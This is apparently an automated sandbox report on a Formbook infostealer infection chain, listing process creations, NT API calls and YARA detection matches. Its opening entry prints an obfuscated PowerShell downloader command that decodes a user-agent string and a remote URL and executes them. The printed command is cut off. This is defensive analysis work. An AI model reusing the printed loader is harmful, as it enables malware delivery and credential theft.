          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248935C0 NtCreateMutant,LdrInitializeThunk,11_2_248935C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24892DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_24892DF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24894650 NtSuspendThread,11_2_24894650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24893090 NtSetValueKey,11_2_24893090
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F04650 NtSuspendThread,LdrInitializeThunk,13_2_04F04650
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F04340 NtSetContextThread,LdrInitializeThunk,13_2_04F04340
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_04F02CA0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_04F02C70
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02C60 NtCreateKey,LdrInitializeThunk,13_2_04F02C60
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_04F02DF0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02DD0 NtDelayExecution,LdrInitializeThunk,13_2_04F02DD0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_04F02D30
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02D10 NtMapViewOfSection,LdrInitializeThunk,13_2_04F02D10
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02EE0 NtQueueApcThread,LdrInitializeThunk,13_2_04F02EE0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_04F02E80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02FE0 NtCreateFile,LdrInitializeThunk,13_2_04F02FE0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02FB0 NtResumeThread,LdrInitializeThunk,13_2_04F02FB0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02F30 NtCreateSection,LdrInitializeThunk,13_2_04F02F30
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02AF0 NtWriteFile,LdrInitializeThunk,13_2_04F02AF0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02AD0 NtReadFile,LdrInitializeThunk,13_2_04F02AD0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04F02BF0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02BE0 NtQueryValueKey,LdrInitializeThunk,13_2_04F02BE0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_04F02BA0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02B60 NtClose,LdrInitializeThunk,13_2_04F02B60
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F035C0 NtCreateMutant,LdrInitializeThunk,13_2_04F035C0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F039B0 NtGetContextThread,LdrInitializeThunk,13_2_04F039B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02CF0 NtOpenProcess,13_2_04F02CF0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02CC0 NtQueryVirtualMemory,13_2_04F02CC0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02C00 NtQueryInformationProcess,13_2_04F02C00
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02DB0 NtEnumerateKey,13_2_04F02DB0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02D00 NtSetInformationFile,13_2_04F02D00
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02EA0 NtAdjustPrivilegesToken,13_2_04F02EA0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02E30 NtWriteVirtualMemory,13_2_04F02E30
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02FA0 NtQuerySection,13_2_04F02FA0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02F90 NtProtectVirtualMemory,13_2_04F02F90
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02F60 NtCreateProcessEx,13_2_04F02F60
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02AB0 NtWaitForSingleObject,13_2_04F02AB0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F02B80 NtQueryInformationFile,13_2_04F02B80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F03090 NtSetValueKey,13_2_04F03090
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F03010 NtOpenDirectoryObject,13_2_04F03010
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F03D70 NtOpenThread,13_2_04F03D70
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F03D10 NtOpenProcessToken,13_2_04F03D10
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ED8B10 NtCreateFile,13_2_02ED8B10
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ED8E10 NtClose,13_2_02ED8E10
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ED8F70 NtAllocateVirtualMemory,13_2_02ED8F70
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ED8C80 NtReadFile,13_2_02ED8C80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ED8D70 NtDeleteFile,13_2_02ED8D70
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2F7A4 NtUnmapViewOfSection,13_2_04D2F7A4
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2F0FF NtQueryInformationProcess,13_2_04D2F0FF
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2F05C NtQueryInformationProcess,13_2_04D2F05C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2F04B NtQueryInformationProcess,13_2_04D2F04B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2F01B NtQueryInformationProcess,13_2_04D2F01B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2F036 NtQueryInformationProcess,13_2_04D2F036
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2F869 NtUnmapViewOfSection,13_2_04D2F869
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8AC0224_2_00007FFD9B8AC022
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8AB2BF4_2_00007FFD9B8AB2BF
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B97A21A4_2_00007FFD9B97A21A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_046BF3206_2_046BF320
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_046BFBF06_2_046BFBF0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_046BEFD86_2_046BEFD8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_073ECDE06_2_073ECDE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2490E4F611_2_2490E4F6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2491F43F11_2_2491F43F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2491244611_2_24912446
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485146011_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2492059111_2_24920591
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248FD5B011_2_248FD5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486053511_2_24860535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2491757111_2_24917571
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249116CC11_2_249116CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487C6E011_2_2487C6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2491F7B011_2_2491F7B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485C7C011_2_2485C7C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488475011_2_24884750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486077011_2_24860770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F7E4F613_2_04F7E4F6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8244613_2_04F82446
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F9059113_2_04F90591
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED053513_2_04ED0535
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEC6E013_2_04EEC6E0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ECC7C013_2_04ECC7C0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED077013_2_04ED0770
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF475013_2_04EF4750
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6200013_2_04F62000
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F881CC13_2_04F881CC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F901AA13_2_04F901AA
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F5815813_2_04F58158
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC010013_2_04EC0100
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6A11813_2_04F6A118
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F502C013_2_04F502C0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F7027413_2_04F70274
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EDE3F013_2_04EDE3F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F903E613_2_04F903E6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8A35213_2_04F8A352
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC0CF213_2_04EC0CF2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F70CB513_2_04F70CB5
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0C0013_2_04ED0C00
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ECADE013_2_04ECADE0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE8DBF13_2_04EE8DBF
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EDAD0013_2_04EDAD00
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8EEDB13_2_04F8EEDB
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8CE9313_2_04F8CE93
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE2E9013_2_04EE2E90
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED0E5913_2_04ED0E59
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8EE2613_2_04F8EE26
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC2FC813_2_04EC2FC8
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F4EFA013_2_04F4EFA0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F44F4013_2_04F44F40
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F12F2813_2_04F12F28
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EF0F3013_2_04EF0F30
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EFE8F013_2_04EFE8F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EB68B813_2_04EB68B8
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED284013_2_04ED2840
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EDA84013_2_04EDA840
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED29A013_2_04ED29A0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F9A9A613_2_04F9A9A6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EE696213_2_04EE6962
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ECEA8013_2_04ECEA80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F86BD713_2_04F86BD7
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8AB4013_2_04F8AB40
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EC146013_2_04EC1460
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8F43F13_2_04F8F43F
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6D5B013_2_04F6D5B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8757113_2_04F87571
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F816CC13_2_04F816CC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8F7B013_2_04F8F7B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F870E913_2_04F870E9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8F0E013_2_04F8F0E0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED70C013_2_04ED70C0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F7F0CC13_2_04F7F0CC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EDB1B013_2_04EDB1B0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F9B16B13_2_04F9B16B
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBF17213_2_04EBF172
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F0516C13_2_04F0516C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F712ED13_2_04F712ED
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EED2F013_2_04EED2F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEB2C013_2_04EEB2C0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED52A013_2_04ED52A0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F1739A13_2_04F1739A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EBD34C13_2_04EBD34C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8132D13_2_04F8132D
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FCF213_2_04F8FCF2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F49C3213_2_04F49C32
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEFDC013_2_04EEFDC0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F87D7313_2_04F87D73
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F81D5A13_2_04F81D5A
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED3D4013_2_04ED3D40
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED9EB013_2_04ED9EB0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E93FD213_2_04E93FD2
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E93FD513_2_04E93FD5
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FFB113_2_04F8FFB1
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED1F9213_2_04ED1F92
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FF0913_2_04F8FF09
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED38E013_2_04ED38E0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F3D80013_2_04F3D800
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04ED995013_2_04ED9950
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEB95013_2_04EEB950
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6591013_2_04F65910
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F7DAC613_2_04F7DAC6
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F15AA013_2_04F15AA0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F6DAAC13_2_04F6DAAC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F43A6C13_2_04F43A6C
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FA4913_2_04F8FA49
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F87A4613_2_04F87A46
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F45BF013_2_04F45BF0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F0DBF913_2_04F0DBF9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04E99B8013_2_04E99B80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04EEFB8013_2_04EEFB80
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F8FB7613_2_04F8FB76
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC188013_2_02EC1880
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBC7C913_2_02EBC7C9
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBC7D013_2_02EBC7D0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBAA7013_2_02EBAA70
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EBC9F013_2_02EBC9F0
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC4F1013_2_02EC4F10
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC30FC13_2_02EC30FC
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC114013_2_02EC1140
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EC310013_2_02EC3100
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02EDB40013_2_02EDB400
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2E6CE13_2_04D2E6CE
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2D70413_2_04D2D704
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2D73813_2_04D2D738
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2E21413_2_04D2E214
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04D2E33313_2_04D2E333
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 2484B970 appears 38 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 248DF290 appears 34 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04F17E54 appears 97 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04EBB970 appears 257 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04F4F290 appears 103 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04F05130 appears 57 times
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04F3EA12 appears 86 times
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9379
          Source: unknownProcess created: Commandline size = 9379
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9379Jump to behavior
          Source: amsi32_5812.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 1068, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
